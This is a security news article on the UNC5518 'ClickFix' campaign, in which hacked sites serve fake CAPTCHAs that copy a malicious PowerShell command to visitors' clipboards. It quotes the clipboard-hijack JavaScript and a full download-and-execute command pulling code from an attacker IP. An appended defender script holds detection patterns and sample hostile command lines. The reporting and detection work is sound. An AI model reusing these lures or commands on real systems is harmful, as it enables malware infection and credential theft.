UNC5518 Group Hacks Legitimate Websites to Inject Fake Captcha That Tricks Users to Execute Malware

Posted on August 21, 2025August 21, 2025 By CWS

A sophisticated cybercrime operation has emerged, targeting unsuspecting web users through a deceptive social engineering technique that exploits one of the web's most trusted security mechanisms.

Since June 2024, the financially motivated threat group UNC5518 has been systematically compromising legitimate websites to inject malicious fake CAPTCHA verification pages, tricking visitors into unknowingly executing malware on their systems.

The attack campaign, dubbed "ClickFix" by security researchers, represents a particularly insidious form of social engineering that leverages users' familiarity with routine CAPTCHA challenges. When victims encounter these fraudulent verification pages, they are presented with what appears to be a standard reCAPTCHA interface, complete with the familiar "I'm not a robot" checkbox and Google branding.

However, clicking on this seemingly innocuous element triggers a malicious JavaScript payload that automatically copies a PowerShell command to the user's clipboard.

Google Cloud analysts identified that UNC5518 operates as an access-as-a-service provider, partnering with multiple affiliate threat groups to monetize its initial compromise capabilities.

The group's infrastructure supports various downstream actors, including UNC5774, which specializes in deploying the CORNFLAKE.V3 backdoor, and UNC4108, known for using PowerShell-based tools and conducting extensive network reconnaissance.

Attack lifecycle (Source – Google Cloud)

The technical execution of this attack shows considerable attention to detail in mimicking legitimate web security practices.

The malicious JavaScript embedded within compromised websites creates a convincing CAPTCHA interface using code that closely resembles genuine Google reCAPTCHA implementations.

When victims interact with the fake verification system, the following code executes silently in the background:

document.getElementById("j").onclick = function () {
    // Create a hidden textarea holding the attacker's PowerShell string (_0xC, defined elsewhere in the page)
    var ta = document.createElement("textarea");
    ta.value = _0xC;
    document.body.appendChild(ta);
    ta.select();
    // Copy the selected text into the user's clipboard
    document.execCommand("copy");
};

This script automatically copies a carefully crafted PowerShell command to the victim's clipboard, which appears as: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)%0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex".

The command is designed to download and execute additional malware payloads from attacker-controlled infrastructure.

Infection Mechanism and Payload Delivery

The ClickFix technique exploits a critical weakness in user behavior, capitalizing on the widespread acceptance of and trust in CAPTCHA systems.

Once the malicious PowerShell command is copied to the clipboard, victims are typically instructed via on-screen prompts to paste and execute the command using the Windows Run dialog (Windows+R), believing they are completing a legitimate verification process.

Upon execution, the PowerShell script initiates a multi-stage infection chain that includes comprehensive anti-analysis measures.

The malware performs environment checks to detect virtual machines and sandboxes, examining system memory configuration and manufacturer information to evade security analysis environments.

If these checks pass, the script downloads Node.js runtime components from legitimate sources and deploys the CORNFLAKE.V3 backdoor, which establishes persistent access through registry modifications and enables comprehensive system reconnaissance, including Active Directory enumeration and Kerberoasting credential-harvesting techniques.
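As an added defender-side example (not from the original article or from Google Cloud's report), the following Python flags process-creation records that match the execution chain described above: PowerShell started with a hidden window, from an interactive parent such as explorer.exe (which is what a Run-dialog launch looks like), and pulling its payload through a download-and-execute cradle. The log records, IP address and file paths are constructed for the example.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) style records, not real telemetry.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1')"
                    ".TotalSeconds)%0xfffffffffffffff0;irm 192.0.2.10:8080/$u|iex\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File C:\\scripts\\cleanup.ps1"},
    {"ParentImage": r"C:\Program Files\Agent\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iwr https://updates.example/pkg.ps1 | iex\""},
]

# -w h, -w hidden, -windowstyle hidden
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
# a download primitive whose output is piped into Invoke-Expression
CRADLE = re.compile(r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString)\b"
                    r".*?\|\s*(?:iex|Invoke-Expression)\b", re.I | re.S)
# bare IPv4 (optionally with port) used as a URL host, as in the ClickFix command
RAW_IP = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/")

def classify(event):
    """Return the list of indicator names observed in one process-creation event."""
    cmd = event["CommandLine"]
    hits = []
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        hits.append("interactive-launch")   # consistent with Win+R / Run dialog
    if HIDDEN.search(cmd):
        hits.append("hidden-window")
    if CRADLE.search(cmd):
        hits.append("download-cradle")
    if RAW_IP.search(cmd):
        hits.append("raw-ip-url")
    return hits

def is_clickfix_like(event):
    """Alert when a cradle is combined with a hidden window or an interactive parent."""
    hits = set(classify(event))
    return "download-cradle" in hits and bool(hits & {"hidden-window", "interactive-launch"})

def triage(events=EVENTS):
    """Return (index, indicators) for every event that should be escalated."""
    return [(i, classify(e)) for i, e in enumerate(events) if is_clickfix_like(e)]

if __name__ == "__main__":
    for idx, reasons in triage():
        print(f"event {idx}: {', '.join(reasons)}")
```

During triage, the command a victim pasted into the Run dialog is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which gives a host-side artifact to corroborate the process-creation match.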
